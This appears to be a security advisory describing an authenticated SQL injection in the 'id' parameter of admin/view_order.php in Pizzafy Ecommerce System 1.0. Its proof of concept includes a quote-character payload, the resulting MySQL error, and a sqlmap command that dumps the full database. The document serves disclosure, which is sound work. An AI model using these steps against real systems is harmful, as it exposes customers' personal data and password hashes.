Share
## https://sploitus.com/exploit?id=PACKETSTORM:220076
# SQL Injection in Pizzafy Ecommerce System โ€” `admin/view_order.php`
    
    ## Details
    
    | Field | Value |
    |---|---|
    | **Vendor** | SourceCodester |
    | **Product** | Pizzafy Ecommerce System using PHP and MySQL |
    | **Version** | 1.0 |
    | **Vulnerability** | SQL Injection |
    | **CWE** | CWE-89 |
    | **CVSSv3 Score** | 7.2 (High) |
    | **Attack Vector** | Network |
    | **Auth Required** | Yes (Administrator) |
    | **Researcher** | Xmyronn |
    | **Date** | 2026-04-11 |
    
    https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
    
    ---
    
    ## Affected Component
    
    **File:** `Pizzafy/admin/view_order.php`  
    **Parameter:** `id` (GET)
    
    ---
    
    ## Description
    
    The `admin/view_order.php` endpoint in Pizzafy Ecommerce System 1.0 fails to properly sanitize the `id` GET parameter before passing it to a MySQL query. An authenticated administrator can manipulate this parameter to inject arbitrary SQL, leading to full database compromise.
    
    ---
    
    ## Proof of Concept
    
    ### Step 1 โ€” Login as Administrator
    
    Navigate to:
    ```
    http://localhost/pizzafy/Pizzafy/admin/index.php
    ```
    Login with admin credentials.
    
    ### Step 2 โ€” Navigate to Orders
    
    ```
    http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
    ```
    <img width="1920" height="1080" alt="Screenshot 2026-04-11 212106" src="https://github.com/user-attachments/assets/b415920d-d2c9-42f6-9ecb-0e3579b7e399" />
    
    
    Click **View Order** on any order entry.
    <img width="1920" height="1080" alt="Screenshot 2026-04-11 212116" src="https://github.com/user-attachments/assets/9d8db0fb-a08f-445d-9592-818636531009" />
    
    
    ### Step 3 โ€” Intercept Request in Burp Suite
    
    The intercepted GET request looks like:
    <img width="1920" height="1080" alt="Screenshot 2026-04-11 212135" src="https://github.com/user-attachments/assets/3149154e-853f-4a88-81dc-be00a209df2f" />
    
    
    ### Step 4 โ€” Trigger SQL Error
    
    Modify `id=1` to `id='`:
    <img width="1920" height="1080" alt="Screenshot 2026-04-11 212145" src="https://github.com/user-attachments/assets/506ae221-64b0-42e9-a959-ecadfa5029e9" />
    
    ```
    GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1
    ```
    
    **Response โ€” MySQL error exposed:**
    
    ```
    Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
    check the manual that corresponds to your MariaDB server version for the right
    syntax to use near ''' at line 1 in
    C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15
    ```
    
    ### Step 5 โ€” Exploit with sqlmap
    
    Save the request to `view_order.txt` and run:
    
    ```bash
    sqlmap -r view_order.txt --dump --batch
    ```
    <img width="1920" height="1080" alt="Screenshot 2026-04-11 212406" src="https://github.com/user-attachments/assets/438e9b26-4927-462d-b3db-234d77626a84" />
    
    
    **sqlmap confirmed injection types:**
    
    | Type | Title |
    |---|---|
    | Boolean-based blind | AND boolean-based blind โ€” WHERE clause |
    | Error-based | MySQL >= 5.0 FLOOR error-based |
    | Time-based blind | MySQL >= 5.0.12 SLEEP |
    | UNION query | Generic UNION query โ€” 11 columns |
    
    **Full database dumped:**
    
    ```
    Database: pizzafy
    Tables: users, user_info, orders, order_list, product_list, category_list, system_settings
    ```
    
    Sensitive data exposed includes bcrypt password hashes, customer emails, order details, and system configuration.
    
    ---
    
    ## Impact
    
    A malicious authenticated administrator (or attacker who has obtained admin credentials) can:
    - Dump the full database including password hashes
    - Read sensitive customer PII (names, emails, addresses, phone numbers)
    - Potentially write to the database
    
    ---
    
    ## References
    
    - [SourceCodester โ€” Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)
    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command.